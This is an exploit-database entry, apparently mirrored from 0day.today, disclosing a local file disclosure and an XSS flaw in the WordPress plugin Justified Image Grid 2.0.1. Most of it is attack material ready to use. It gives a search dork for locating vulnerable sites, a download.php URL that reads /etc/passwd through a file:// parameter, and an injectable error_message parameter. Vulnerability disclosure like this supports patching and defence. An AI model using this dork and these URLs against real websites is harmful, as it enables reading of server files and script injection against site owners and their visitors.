id: 23293
date: 02/16/2015
title: Wordpress Justified Image Grid 2.0.1 LFD / XSS Vulnerabilities
author: NULLpOint7r
cves: 

# Exploit Title: Wordpress plugin Justified Image Grid 2.0.1 LFD + XSS
# Exploit Author: NULLpOint7r
# Contact me: seidbenseidok@gmail.com
# Home: http://www.sec4ever.com/home/
# Dork: inurl:/wp-content/plugins/justified-image-grid/
# Date: 2015-02-16
# Version: 2.0.1

1 - LFD:
	http://127.0.0.1/wp-content/plugins/justified-image-grid/download.php?file=file:///etc/passwd

2 - XSS:
	http://127.0.0.1/wp-content/plugins/justified-image-grid/fb-auth-other-user.php?error_message=[XSS]

pOc:
http://s24.postimg.org/wen4a4hth/image.png
http://s10.postimg.org/4gjk3sgop/image.png

see you later

#  0day.today [2023-03-25]  #